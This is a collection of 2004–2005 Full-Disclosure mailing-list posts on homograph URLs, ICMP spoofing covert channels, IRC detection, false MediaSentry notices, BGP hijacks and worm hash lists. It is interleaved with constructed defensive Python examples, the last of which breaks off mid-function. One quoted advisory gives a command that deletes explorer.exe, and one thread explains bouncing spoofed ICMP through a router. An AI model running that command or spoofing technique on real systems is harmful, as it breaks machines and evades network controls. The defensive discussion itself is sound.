[Full-Disclosure] Re: Homograph attack fools (older versions of) Internet Explorer too

2005-02-09 Thread Kevin Connolly
Use of Unicode codes in the href fools older versions of IE when it parses
the hostname part.
Obviously this has been fixed in a previous patch (my bad for not checking with
a fully patched machine first!)
NOT vulnerable  IE 6.0.2800.1106.xpsp2.040919-1003C0
vulnerable  IE 6.0.2800.1106.xpsp2.030422-1633
I may get around to writing up the details but it is not urgent now that
I know that fully patched IE is not vulnerable to this.
Kevin
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
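
Added example, not part of Kevin Connolly's post (which gives no details of the
trick): a small Python check for the kind of hostname the subject line is about,
one whose Unicode letters look like ASCII letters. The confusable table and the
sample hostnames are constructed for the example; the only real detail it reuses
is the well-known Cyrillic-a "paypal" case, whose Punycode form is
xn--pypal-4ve.com.

```python
import unicodedata

# Partial confusable table, constructed for this example: Cyrillic and Greek
# letters whose glyphs are indistinguishable from Latin ones in common fonts.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u0456": "i",
    "\u0458": "j", "\u0455": "s", "\u04bb": "h", "\u03bf": "o",
}

def script_of(ch):
    """Script of a character, taken from the first word of its Unicode name
    ("CYRILLIC SMALL LETTER A" -> "CYRILLIC"). Digits, dot and hyphen are
    script-neutral."""
    if ch in "-.0123456789":
        return "COMMON"
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]

def skeleton(label):
    """Replace confusable letters by the Latin letter they imitate."""
    return "".join(CONFUSABLES.get(c, c) for c in label)

def analyze_hostname(host):
    """Return a dict describing why `host` is or is not a homograph candidate.

    punycode            : the form a resolver actually looks up
    mixed_script_labels : labels combining letters from more than one script
    spoofs              : (label, ascii_lookalike) for non-ASCII labels whose
                          confusable-mapped form is plain ASCII
    """
    host = unicodedata.normalize("NFKC", host.rstrip(".")).lower()
    mixed, spoofs = [], []
    for label in host.split("."):
        scripts = {script_of(c) for c in label} - {"COMMON"}
        if len(scripts) > 1:
            mixed.append(label)
        if not label.isascii():
            lookalike = skeleton(label)
            if lookalike.isascii() and lookalike != label:
                spoofs.append((label, lookalike))
    try:
        punycode = host.encode("idna").decode("ascii")
    except UnicodeError:
        punycode = None          # label rejected by nameprep or over-long
    return {"punycode": punycode, "mixed_script_labels": mixed,
            "spoofs": spoofs, "suspicious": bool(mixed or spoofs)}

if __name__ == "__main__":
    for h in ("paypal.com", "p\u0430ypal.com", "\u043c\u0438\u0440.example"):
        print(h, analyze_hostname(h))
```

A browser or proxy filter has two signals to work with: a label that mixes
scripts is almost never legitimate, and a label that is non-ASCII yet becomes a
plain ASCII name once look-alike letters are mapped is a spoof of that name. A
hostname written entirely in one non-Latin script (the third sample) trips
neither. Showing the xn-- form in the address bar is the user-facing version of
the same check.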


Re: [Full-Disclosure] ICMP Covert channels question

2005-02-02 Thread Kevin
cyberpixl wrote:
 Well, what I meant was what if I use the network's router as a bounce
 host in order to get the packets into the network?

 If an ICMP packet arrives at the router's WAN port with a source IP of an
 internal host, will it send the echo reply to its LAN port?

Yes.  Lacking proper anti-spoof ingress filtering, this will work.

 I currently haven't got the chance to test this, but I will as soon as
 I can. Then, in order to receive replies from the host behind the
 firewall, all I'd have to do is make it send packets to a bounce server
 outside the network, like google.com, with the source set to my IP
 (assuming then that the router freely allows ICMP traffic out
 of the network).

Yes, lacking proper anti-spoof egress filtering, this will work.  A
correctly configured firewall should reject such packets on several
grounds, even if ICMP is permitted by policy.


On Wed, 02 Feb 2005 13:02:07 -0500, [EMAIL PROTECTED] wrote:
  Also, packet filtering is based on router configuration. More and more
  administrators are filtering packets with unexpected source and/or
  destination addresses ( ingress and egress filtering ).

Proper ingress and egress filtering at all edge routers is critical
for security.
Rarely do I find a small site blocking outbound traffic based on the source IP.
While non-routable *destination* addresses should not make it across the
Internet, it is common for unroutable source addresses to be seen on inbound
packets coming from the Internet.


 The number of sites doing proper filtering may be growing, but it's certainly
 still low enough that the attack still has a fairly high chance of working.

With a growing number of ISPs implementing Reverse Path Forwarding
(aka Unicast RPF) on all customer connections, it should become more
difficult to inject spoofed traffic through reputable providers.

Kevin
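
Added example, not from the thread: a toy router model in Python showing what
strict unicast RPF does to the two spoofed packets discussed above, the echo
request arriving from the Internet with an inside source, and the packet leaving
the LAN with the attacker's outside source. Addresses, prefixes and interface
names are constructed.

```python
import ipaddress

class Router:
    """Toy router: a routing table plus per-interface anti-spoof checks.

    Constructed for this example. A route whose interface is None is a
    null route (a bogon sink)."""

    def __init__(self, routes):
        # Longest prefix wins, so keep the table sorted by prefix length.
        self.routes = sorted(((ipaddress.ip_network(p), i) for p, i in routes),
                             key=lambda r: r[0].prefixlen, reverse=True)

    def lookup(self, addr):
        """Interface the router would use to reach `addr`, or None."""
        a = ipaddress.ip_address(addr)
        for net, iface in self.routes:
            if a in net:
                return iface
        return None

    def accept(self, iface, src, loose=False):
        """Anti-spoof check for a packet with source `src` arriving on `iface`.

        loose=False: strict uRPF, the source must route back out the arrival
                     interface (breaks asymmetric routing; fine at a stub site)
        loose=True : loose uRPF, the source only needs some non-null route
        Returns (accepted, reason)."""
        back = self.lookup(src)
        if back is None:
            return False, f"{src}: no route / null route (bogon)"
        if not loose and back != iface:
            return False, f"{src}: reachable via {back}, arrived on {iface}"
        return True, "ok"

SITE = Router([
    ("0.0.0.0/0", "wan"),            # default route to the Internet
    ("198.51.100.0/24", "lan"),      # the site's own (constructed) prefix
    ("10.0.0.0/8", None),            # RFC 1918 space: never valid on the WAN
    ("172.16.0.0/12", None),
    ("192.168.0.0/16", None),
])

def bounce_attempts(router):
    """The two steps of the bounce described in the thread, as the edge router
    sees them. 192.0.2.9 plays the attacker, 198.51.100.7 an inside host."""
    return {
        # step 1: echo request arrives from the Internet claiming to come from
        # an inside host, so the router's echo reply would go to that host
        "inbound_spoofed_internal_src": router.accept("wan", "198.51.100.7"),
        # step 2: the inside host sends to an outside bounce server with the
        # attacker's address as source, so the reply goes to the attacker
        "outbound_spoofed_external_src": router.accept("lan", "192.0.2.9"),
        # for contrast, the same sources arriving where they belong
        "legit_inbound": router.accept("wan", "192.0.2.9"),
        "legit_outbound": router.accept("lan", "198.51.100.7"),
    }

if __name__ == "__main__":
    for name, (ok, why) in bounce_attempts(SITE).items():
        print(f"{name:32s} {'ACCEPT' if ok else 'DROP  '} {why}")
```

Note the difference between the two modes: loose uRPF does not stop step 1,
because the site's own prefix has a perfectly good route; only strict mode on
the WAN side (or an explicit inbound deny of your own prefix as source) does.
Bogon filtering alone catches neither step, since both spoofed sources are
routable addresses.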


Re: [Full-Disclosure] Scan for IRC

2005-01-21 Thread Kevin
On Fri, 21 Jan 2005 17:34:00 -0600, RandallM [EMAIL PROTECTED] wrote:
 I am so sorry for interrupting the list. I'm trying to pick up IRC
 communications on the network. I've made some filters for Ethereal and
 Observer but can't seem to pick it up. I'm doing something wrong. Used the
 6668-6669 ports. Any help?

Not only can an IRC server be on any port (as mentioned by Oliver
Leitner), but clients can also tunnel the connection through proxies,
or even fully encrypt chat sessions inside SSL, within an SSH tunnel,
or in a binary packet protocol such as SILC.

Assuming the communication is in the clear, you could use Snort to
detect IRC communication, regardless of port.  More on this topic can
be found here:
http://www.giac.org/practical/GSEC/Chris_Hanna_GSEC.pdf

Kevin

(P.S. I don't know who Chris Hanna is, but the paper seems sound.)
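
Added example, not part of Kevin's reply or of the GIAC paper he links: a
port-independent IRC detector in Python, run over constructed sample payloads.
It implements the same idea as a Snort content rule (match the protocol's verbs,
not the port) and also shows the case the reply warns about, a session wrapped in
SSL, which it cannot see into.

```python
import re

# IRC client->server and server->client lines start with a verb (or a 3-digit
# numeric reply); server lines carry a ":prefix " first. Matched per line.
IRC_LINE = re.compile(
    rb"^(?::[^ \r\n]+ )?"                                    # optional prefix
    rb"(NICK|USER|JOIN|PRIVMSG|NOTICE|PING|PONG|MODE|PART|QUIT|\d{3}) ",
    re.MULTILINE | re.IGNORECASE)

def irc_score(payload):
    """Number of distinct IRC verbs seen in one direction of a TCP stream."""
    return len({m.group(1).upper() for m in IRC_LINE.finditer(payload)})

def looks_like_irc(payload, min_commands=2):
    """Two different verbs is a far stronger signal than one: 'PING ' or a
    bare 3-digit code also shows up in HTTP headers and other protocols."""
    return irc_score(payload) >= min_commands

def scan_flows(flows):
    """flows: iterable of (src, sport, dst, dport, payload_bytes).
    Returns the flows carrying cleartext IRC, whatever port they use."""
    return [(src, sport, dst, dport) for src, sport, dst, dport, p in flows
            if looks_like_irc(p)]

# Constructed sample traffic, not captured from a real network.
SAMPLE_FLOWS = [
    ("10.0.0.5", 51234, "203.0.113.10", 6667,           # classic port
     b"NICK bot1337\r\nUSER bot 0 * :bot\r\nJOIN #c\r\n"),
    ("10.0.0.9", 51812, "203.0.113.20", 80,             # IRC hiding on 80
     b":irc.example NOTICE AUTH :*** Looking up your hostname\r\n"
     b":irc.example 001 bot2 :Welcome\r\nPING :irc.example\r\n"),
    ("10.0.0.9", 51900, "203.0.113.30", 443,            # TLS ClientHello:
     b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03" + b"\x00" * 32),  # opaque
    ("10.0.0.7", 52000, "203.0.113.40", 80,             # plain HTTP, with a
     b"GET / HTTP/1.1\r\nHost: www.example\r\nUser-Agent: PING \r\n\r\n"),  # decoy
]

if __name__ == "__main__":
    for hit in scan_flows(SAMPLE_FLOWS):
        print("IRC:", hit)
```

A Snort rule built the same way anchors on content such as "NICK " or "JOIN #"
with a flow direction instead of on a port number; the Ethereal filter that
failed in the question was matching 6668-6669 only. Nothing here helps with the
SSL, SSH-tunnelled or SILC cases from the reply: for those you are back to
looking at endpoints, certificates and traffic shape rather than payload.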


Re: [Full-Disclosure] MediaSentry false positives?

2005-01-13 Thread Kevin
On Wed, 05 Jan 2005 09:53:55 -0500, [EMAIL PROTECTED] wrote:
 On Tue, 04 Jan 2005 23:22:27 CST, Kevin said:
  I see two likely possibilities -- either MediaSentry is not using due
  diligence in verifying that the material for which they send
  infringement notices is actually shared from the address they show in
  the complaint,

It turns out that this is the case.

Just this morning we received a message from the copyright holder (not
MediaSentry, they've completely ignored our emails and phone calls
through the whole process) stating: "Please disregard the notice you
received. It was generated incorrectly, and the case ID or IDs
mentioned are now closed. (A configuration problem with our
anti-piracy vendor's system caused some notices to be sent in error.)"



  or somebody on the Internet is spoofing BGP route
  announcements for unused address space out of larger allocations.
 
 This is actually quite likely a possibility.  There are enough tier-1's who do
 a piss-poor job of filtering their BGP feeds that if you can inject an
 announcement you can hijack the address block. 

Thanks to BJ Premore from Renesys, we have been able to confirm that
the addresses in question were _not_ hijacked during the time period
where MediaSentry reported an infringing file share.

The only recent hijack event covering any of our reported IP
addresses didn't match up with any of the incident timestamps, and was
related to the December 24th Turk Telekom incident (ours being one of
many thousand prefixes announced through TTNet).

We are investigating using Renesys services, myASn, and other BGP
monitoring approaches to proactively detect future hijacks. 
Unfortunately, this doesn't address any underlying flaws in the
mechanisms used by MediaSentry (and other similar services) to detect
and report copyright infringement.

Kevin Kadow


Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-12 Thread Kevin Reiter
original got bounced (mailbox full?)

: snip
:
: : Windows Explorer is an advanced browsing tool made by Microsoft. It is used
: : in daily tasks to open folders, copy files, delete files, rename files and
: : view files on a system. It is the foundation of the World Wide Web and used
:
: OK, we need to figure out which Explorer this guy is talkin' about - Internet
: Explorer or Windows Explorer.
:
: : Shogun Suzuki discovered that a remote user can connect to any machine via
: : numerous exploits and use Windows Explorer to view files, rename files,
: : delete files, change permissions on files stored on a remote machine that
: : has been pwned.
:
: ..such as ...  (HINT:  What 'sploits?)
:
: : On a command prompt: del C:\WINDOWS\explorer.exe
:
: Erm...sure...OK.   But what happens when the poor sucker reboots the box and
: discovers the O/S is inop (provided the O/S even lets you delete the file in the
: first place, since explorer.exe is the shell ...)?
:
: Sorry, but this was the very first post I saw after I joined this list a little
: bit ago, and I couldn't resist a few comments.  Is this guy for real, or is this a
: joke?
:
: -K
:



Re: [Full-Disclosure] MediaSentry false positives?

2005-01-11 Thread Kevin
On Wed, 05 Jan 2005 13:00:41 +0100, Florian Weimer [EMAIL PROTECTED] wrote:
 Kevin Kadow wrote:
  Has anybody received Notice of claimed infringement from MediaSentry
  for IP addresses which, while registered to you or your organization,
  are in a range not actively in use?
 
 I've independently received another report of this problem.
 
  I see two likely possibilities -- either MediaSentry is not using due
  diligence in verifying that the material for which they send
  infringement notices is actually shared from the address they show in
  the complaint,  or somebody on the Internet is spoofing BGP route
  announcements for unused address space out of larger allocations.
 
 RIPE doesn't have an announcement of the prefix, so I think
 MediaSentry was in error.
 
 I don't think it makes sense for MediaSentry to check their findings
 more closely from a business perspective.  They don't try to download
 the infringing material to confirm that redistribution actually takes
 place, either.

Sounds like an opportunity to take down MediaSentry.

The takedown notices state the following:

] On behalf of copyright holder, owner of the exclusive rights to the
] copyrighted material at issue in this notice, we hereby state, that
] we have a good faith belief that use of the material in the manner
] complained of is not authorized by copyright holder, its respective
] agents, or the law.
]
] Also, we hereby state, under penalty of perjury, under the laws of
] the State of California and under the laws of the United States, that the
] information in this notification is accurate and that we are authorized 
] to act on behalf of the owner of the exclusive rights being infringed
] as set forth in this notification.

Given the references to "good faith" and "perjury" in the above text,
if the data collection methods employed by MediaSentry are
demonstrably faulty and falsely implicate source IP addresses not
actually participating in file sharing (not a spoofed BGP route,
rather a bogus entry in the Kazaa or eDonkey indexes showing the wrong
source IP), is MediaSentry still protected by the good faith
clause?

Kevin


Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Kevin Reiter
snip

: Windows Explorer is an advanced browsing tool made by Microsoft. It is used
: in daily tasks to open folders, copy files, delete files, rename files and
: view files on a system. It is the foundation of the World Wide Web and used

OK, we need to figure out which Explorer this guy is talkin' about - Internet
Explorer or Windows Explorer.

: Shogun Suzuki discovered that a remote user can connect to any machine via
: numerous exploits and use Windows Explorer to view files, rename files,
: delete files, change permissions on files stored on a remote machine that
: has been pwned.

..such as ...  (HINT:  What 'sploits?)

: On a command prompt: del C:\WINDOWS\explorer.exe

Erm...sure...OK.   But what happens when the poor sucker reboots the box and
discovers the O/S is inop (provided the O/S even lets you delete the file in the
first place, since explorer.exe is the shell ...)?

Sorry, but this was the very first post I saw after I joined this list a little
bit ago, and I couldn't resist a few comments.  Is this guy for real, or is this a
joke?

-K



Backdoors and source code (was Re: [Full-Disclosure] Multiple Backdoors found...)

2005-01-07 Thread Kevin
On Sun, 02 Jan 2005 20:27:09 -0800, Blue Boar [EMAIL PROTECTED] wrote:
 Dave Aitel wrote:
  Of course, this sort of thing is basically impossible to disprove -
  especially without source.
 
 If I were looking for a well-hidden backdoor, I wouldn't bother with
 source.  There's no guarantee that a particular binary was produced by a
 particular group of source unless you can compile it yourself to the
 same set of bytes.

And even when you have two binary files built by the same compiler
version on two different machines running the same OS version, it's
not uncommon for the two files to not produce the same set of bytes. 
See the recent thread on 'httpd cleanup' from the OpenBSD 'tech' list.


 Even then, you've got no guarantee the backdoor
 isn't introduced as part of the build process or a compiler quirk,
 rather than being in the source.

On the subject of visible source as a protection against backdoors,
I notice that PGP.Com offers source code to their products for
download for exactly this purpose, but does *not* provide any
instructions on how to validate that the binaries produced from the
visible source PGP desktop for Windows match up with the binary
executables and libraries distributed when you install a licensed PGP
desktop build.


[Full-Disclosure] MediaSentry false positives?

2005-01-05 Thread Kevin
Has anybody received Notice of claimed infringement from MediaSentry
for IP addresses which, while registered to you or your organization,
are in a range not actively in use?

I recently received two notices from MediaSentry for MPAA material,
each listing a single file shared via Kazaa, for two very different IP
addresses for which I am a contact.

In both cases, the IP addresses reported were in fact within the range
allocated, however the address shown is not only not in use, no
address with the same first three octets is either used or announced
via BGP, nor have they ever been publicly visible.


I see two likely possibilities -- either MediaSentry is not using due
diligence in verifying that the material for which they send
infringement notices is actually shared from the address they show in
the complaint,  or somebody on the Internet is spoofing BGP route
announcements for unused address space out of larger allocations.

Before I panic and start researching solutions to address the latter
problem, I'm hoping to first verify whether in fact the MediaSentry
notices have any basis in fact?


Thanks,

Kevin Kadow

(P.S. If you have received a similar Notice of claimed infringement
letter from MediaSentry for unused IP addresses, please feel free to
contact me privately.)
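
Added example serving this message and the follow-up above (where Renesys data
was used to rule out a hijack): a Python prefix monitor in the spirit of a
myASn-style alert, not Renesys or myASn code. It takes the prefixes you hold,
each with the origin AS you announce it from (None for allocated but unannounced
space, the situation described here), and flags observed announcements that
would capture traffic for them. All prefixes, AS numbers and the observed table
are constructed.

```python
import ipaddress

class PrefixMonitor:
    """Flag BGP announcements that overlap address space you hold."""

    def __init__(self, owned):
        # owned: {prefix: origin_asn}; origin None = held but never announced
        self.owned = {ipaddress.ip_network(p): asn for p, asn in owned.items()}

    def check(self, announced_prefix, as_path):
        """Alerts for one observed announcement; the origin is the last AS."""
        net = ipaddress.ip_network(announced_prefix)
        origin = as_path[-1]
        alerts = []
        for owned, asn in self.owned.items():
            if net == owned:
                if asn is None:
                    alerts.append(("unannounced-space", str(net), origin))
                elif origin != asn:
                    alerts.append(("origin-mismatch", str(net), origin))
            elif net.subnet_of(owned):
                # a more-specific inside your block wins longest-prefix match
                # everywhere, so it steals that sub-range from you
                if origin != asn:
                    alerts.append(("more-specific-hijack", str(net), origin))
            elif owned.subnet_of(net) and asn is None:
                # you announce nothing, so a covering route captures the space;
                # a legitimate aggregate from your own upstream would have to
                # be whitelisted here in practice
                alerts.append(("covering-route", str(net), origin))
        return alerts

    def audit(self, table):
        """table: iterable of (prefix, as_path). Returns every alert."""
        alerts = []
        for prefix, path in table:
            alerts.extend(self.check(prefix, path))
        return alerts

# Constructed data: an AS that announces one /24 and holds a second /24
# that has never been announced (the situation in this thread).
MON = PrefixMonitor({"198.51.100.0/24": 64500, "203.0.113.0/24": None})

OBSERVED = [                                       # (prefix, AS path) as a
    ("198.51.100.0/24",   [64496, 64497, 64500]),  # route collector sees them
    ("198.51.100.0/25",   [64496, 64500]),         # our own traffic engineering
    ("198.51.100.128/25", [64496, 64666]),         # more-specific from a stranger
    ("203.0.113.0/24",    [64496, 64666]),         # our unused /24, now announced
    ("203.0.112.0/23",    [64496, 64666]),         # covering route over the same
    ("192.0.2.0/24",      [64496, 64498]),         # unrelated prefix
]

if __name__ == "__main__":
    for kind, prefix, origin in MON.audit(OBSERVED):
        print(f"{kind:22s} {prefix:20s} origin AS{origin}")
```

Run against a route-collector feed with timestamps, this is also what settles
the question the thread asks: if no announcement covering the reported address
existed at the time on the notice, the address could not have been sourcing
traffic from anywhere on the Internet, and the notice is simply wrong.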


Re: [Full-Disclosure] List of worm and trojan files

2004-12-24 Thread Kevin
Carilda A Thomas [EMAIL PROTECTED] wrote:
I have been looking but I cannot find a list all in one
place of the various illegitimate files that various worms
and trojans install into Microsoft systems.

What'd really help here is a list of MD5 checks for known bad
binaries.  Obviously a custom build of sdbot or just a simple hexedit
would defeat this, but such a list would still have value against
automated attacks, etc.

 Perhaps I should clarify about this list thing:  A friend
 of mine is apparently running a rogue email server and a
 rogue ftp server, and none of the virus checkers we have
 tried will determine what program or where.  I looked for
 a windows equivalent to lsof but there doesn't appear to
 be one - 

Sysinternals has applications that, taken in combination, do much of
what 'lsof' does under Unix.

Specifically, tcpview
(http://www.sysinternals.com/ntw2k/source/tcpview.shtml) will show you
any listening sockets, the associated process, and the location from
which the process launched.  This should suffice to locate a rogue FTP
service on a Windows PC.

the one I found can only determine the program if
 it sees a packet go by and cannot find a quiescent
 program.  The A/V checkers do not flag an email server,
 considering it a legitimate program.  Task manager is also
 destroyed, so there is no help there.  I was hoping to
 find a list of illegitimate files for which I could check.

Assuming the attacker is competent, the only way to clean a deeply
compromised machine is to reformat the drive and start from scratch. 
The truly paranoid will question whether just formatting the drive is
sufficient.

Kevin Kadow
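
Added example, not code from the thread: hash-list scanning in Python of the sort
Kevin asks for, together with a demonstration of the caveat he gives (a one-byte
edit, the "simple hexedit", takes a file off the list). The planted file and its
hash are constructed; no real malware hashes appear.

```python
import hashlib
import os
import tempfile

def md5_of(path):
    """MD5 of a file, read in chunks so large binaries don't hit memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def scan_tree(root, bad_hashes):
    """Walk `root`; return {path: md5} for files whose MD5 is on the list."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                digest = md5_of(path)
            except OSError:          # unreadable, or vanished while scanning
                continue
            if digest in bad_hashes:
                hits[path] = digest
    return hits

def demo():
    """Plant a fake bot binary, put its hash on the list, scan, then change one
    padding byte (a 'simple hexedit') and scan again.
    Returns (hits_before_edit, hits_after_edit)."""
    fake_bot = b"MZ" + b"\x90" * 64 + b"constructed sdbot stand-in, not malware"
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "system32", "svch0st.exe")
        os.makedirs(os.path.dirname(path))
        with open(path, "wb") as f:
            f.write(fake_bot)
        bad_hashes = {md5_of(path)}
        before = scan_tree(root, bad_hashes)
        with open(path, "r+b") as f:     # flip one byte inside the NOP padding
            f.seek(10)
            f.write(b"\x91")
        after = scan_tree(root, bad_hashes)
    return len(before), len(after)

if __name__ == "__main__":
    print("hits before edit, after edit:", demo())
```

The list still earns its keep against mass-mailed and scanner-dropped copies,
which are byte-identical by the thousand; it is the hand-modified single
installation, exactly the case in this thread, where hash matching is blind and
you fall back to tools such as tcpview to work from the open socket to the file.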


Re: [Full-Disclosure] TCP Port 42 port scans? What the heck over...

2004-12-15 Thread Kevin Finisterre
Theres a patch out today...
Microsoft Security Bulletin MS04-045:
Vulnerability in WINS Could Allow Remote Code Execution (870763)
Bulletin URL:
http://www.microsoft.com/technet/security/bulletin/MS04-045.mspx
Version Number: 1.0
Issued Date: Tuesday, December 14, 2004
Impact of Vulnerability: Remote Code Execution
Maximum Severity Rating: Important
Patch(es) Replaced: This bulletin replaces a prior security update. See 
the frequently asked questions (FAQ) section of this bulletin for the 
complete list.
Caveats: None

-KF
Florian Weimer wrote:
* James Lay:

Here they be.  ODD.  Anyone else seeing this?

Probably yes. 8-) 42/TCP is used by Microsoft's WINS replication, and
this service has got a security hole for which Microsoft has yet to
release a patch.


Re: [Full-Disclosure] [Advisory] Mozilla Products Remote Crash Vulnerability

2004-12-06 Thread Kevin Finisterre
(gdb) c
Continuing.
[New Thread 147461 (LWP 10836)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 10810)]
0x4a8b in GlobalWindowImpl::MakeScriptDialogTitle () from 
/usr/lib/mozilla/components/libgklayout.so
(gdb) bt
#0  0x4a8b in GlobalWindowImpl::MakeScriptDialogTitle () from 
/usr/lib/mozilla/components/libgklayout.so
#1  0x40a5e665 in XPTC_InvokeByIndex () from /usr/lib/mozilla/libxpcom.so
#2  0x412cb905 in NSGetModule () from 
/usr/lib/mozilla/components/libxpconnect.so
#3  0x412d28a5 in NSGetModule () from 
/usr/lib/mozilla/components/libxpconnect.so
#4  0x4005fde6 in js_Invoke () from /usr/lib/libmozjs.so
#5  0x40069215 in js_Interpret () from /usr/lib/libmozjs.so
#6  0x400604ac in js_Execute () from /usr/lib/libmozjs.so
#7  0x4003b8b4 in JS_EvaluateUCScriptForPrincipals () from 
/usr/lib/libmozjs.so
#8  0x411068c8 in nsJSContext::EvaluateString () from 
/usr/lib/mozilla/components/libgklayout.so
#9  0x40fa0020 in nsScriptLoader::EvaluateScript () from 
/usr/lib/mozilla/components/libgklayout.so
#10 0x40f9fc2e in nsScriptLoader::ProcessRequest () from 
/usr/lib/mozilla/components/libgklayout.so
#11 0x40f9f7a5 in nsScriptLoader::IsScriptEventHandler () from 
/usr/lib/mozilla/components/libgklayout.so
#12 0x4101c6e7 in nsHTMLScriptElement::MaybeProcessScript () from 
/usr/lib/mozilla/components/libgklayout.so
#13 0x4101bc66 in nsHTMLScriptElement::SetDocument () from 
/usr/lib/mozilla/components/libgklayout.so
#14 0x40f5ac89 in nsGenericElement::AppendChildTo () from 
/usr/lib/mozilla/components/libgklayout.so
#15 0x41045de4 in HTMLContentSink::ProcessSCRIPTTag () from 
/usr/lib/mozilla/components/libgklayout.so
#16 0x410431d0 in HTMLContentSink::Init () from 
/usr/lib/mozilla/components/libgklayout.so
#17 0x4157318f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#18 0x08a756e8 in ?? ()
#19 0x08d9bd30 in ?? ()
#20 0xb1a8 in ?? ()
#21 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#22 0x08c8e9b8 in ?? ()
#23 0x in ?? ()
#24 0xb1a8 in ?? ()
#25 0x41570f8c in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#26 0x08c8e9b8 in ?? ()
#27 0x08d9bd30 in ?? ()
#28 0xb1d8 in ?? ()
#29 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#30 0x0054 in ?? ()
#31 0x in ?? ()
#32 0xb1d8 in ?? ()
#33 0x41572a56 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#34 0x08c8e9b8 in ?? ()
#35 0x08d9bd30 in ?? ()
#36 0xb1d8 in ?? ()
#37 0x4156889f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#38 0x08162600 in ?? ()
#39 0x in ?? ()
#40 0x08c8e9b8 in ?? ()
#41 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#42 0x0001 in ?? ()
#43 0x0001 in ?? ()
#44 0xb228 in ?? ()
#45 0x4156f1a5 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#46 0x08c8e9b8 in ?? ()
#47 0x08d9bd30 in ?? ()
#48 0x0054 in ?? ()
#49 0x0001 in ?? ()
#50 0x in ?? ()
#51 0x08d9bd30 in ?? ()
#52 0x08c8e9b8 in ?? ()
#53 0x4157132e in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#54 0xb218 in ?? ()
#55 0x415b2840 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#56 0x0001 in ?? ()
#57 0x0001 in ?? ()
#58 0x0001 in ?? ()
#59 0x08c8e9b8 in ?? ()
#60 0x0001 in ?? ()
#61 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#62 0x in ?? ()
#63 0x in ?? ()
#64 0xb268 in ?? ()
#65 0x4156ffcc in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#66 0x08c8e9b8 in ?? ()
#67 0x08972690 in ?? ()
#68 0x0054 in ?? ()
#69 0x08d9bd30 in ?? ()
#70 0x08972800 in ?? ()
#71 0x in ?? ()
#72 0x000f in ?? ()
#73 0x0054 in ?? ()
#74 0x08d9bd30 in ?? ()
#75 0x08c8e9b8 in ?? ()
#76 0x0001 in ?? ()
#77 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#78 0x in ?? ()
#79 0x08972690 in ?? ()
#80 0xb348 in ?? ()
#81 0x4156e357 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#82 0x08c8e9b8 in ?? ()
#83 0x08972690 in ?? ()
#84 0x0028 in ?? ()
#85 0x0805d486 in nsSubstring::Assign ()
Previous frame inner to this frame (corrupt stack?)

-KF
Niek van der Maas wrote:
Hi,
I'm posting it here, the Mozilla guys didn't want to answer or even
confirm this bug. No idea whether this one is exploitable or not, I'll
leave that over to the readers of these lists.
Bye,
Niek van der Maas
MaasOnline
http://maas-online.nl/
Mozilla Products Remote Crash Vulnerability
===
Vendor: The Mozilla Organisation
Product(s): Navigator, Firefox, other Gecko based products
Version(s): All released versions
Platform(s)   : All platforms (confirmed on Windows, Linux and SunOS)
Discovered by : Niek van der Maas, MaasOnline (http://maas-online.nl/)
Advisory URL  : 

Re: [Full-Disclosure] Lycos Europe organizing a DDoS attack against spammers

2004-12-01 Thread Kevin
On Tue, 30 Nov 2004 13:38:31 +0100 (CET), Feher Tamas
[EMAIL PROTECTED] wrote:
 Lycos Europe organizing a DDoS attack against spammers
 
 Lycos Europe has started organizing a distributed
 denial-of-service attack against web sites run by spammers.
 
 Lycos, via its makelovenotspam.com website,
 is offering a free screensaver for download.
 The screensavers make constant http requests to spam websites.

Can anybody provide pointers on how to detect this traffic
by reviewing squid proxy logs?

I'd guess that at least a few of our (thousands of) users will install
makelovenotspam, but lacking the authority to lock down
or examine desktops, I'm limited to reviewing access logs after the
fact to track down offenders.


Thanks,

Kevin Kadow

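
Added example, not part of the post (the question went unanswered in this
thread): a Python pass over squid's native access.log that flags the pattern
the screensaver would leave, the same client fetching the same host over and
over at a steady rate. The log lines are constructed and the spam host name is
invented.

```python
from collections import defaultdict
from urllib.parse import urlsplit

def parse_squid_line(line):
    """One line of squid's native access.log:
    time elapsed client action/code size method url ident hierarchy/peer type
    Returns (timestamp, client, host) or None for a line that doesn't parse."""
    parts = line.split()
    if len(parts) < 7:
        return None
    ts, client, url = float(parts[0]), parts[2], parts[6]
    if "://" in url:
        host = urlsplit(url).hostname
    else:                              # CONNECT lines log "host:port"
        host = url.rsplit(":", 1)[0]
    return ts, client, host

def find_hammering_clients(lines, min_requests=30, max_mean_gap=5.0):
    """Client/host pairs fetched at least `min_requests` times with a mean gap
    of at most `max_mean_gap` seconds. A person reloads a page now and then;
    a screensaver fetching the same spam site in a loop produces a steady
    beat of requests. Returns {(client, host): (count, mean_gap)}."""
    seen = defaultdict(list)
    for line in lines:
        rec = parse_squid_line(line)
        if rec:
            ts, client, host = rec
            seen[(client, host)].append(ts)
    flagged = {}
    for key, stamps in seen.items():
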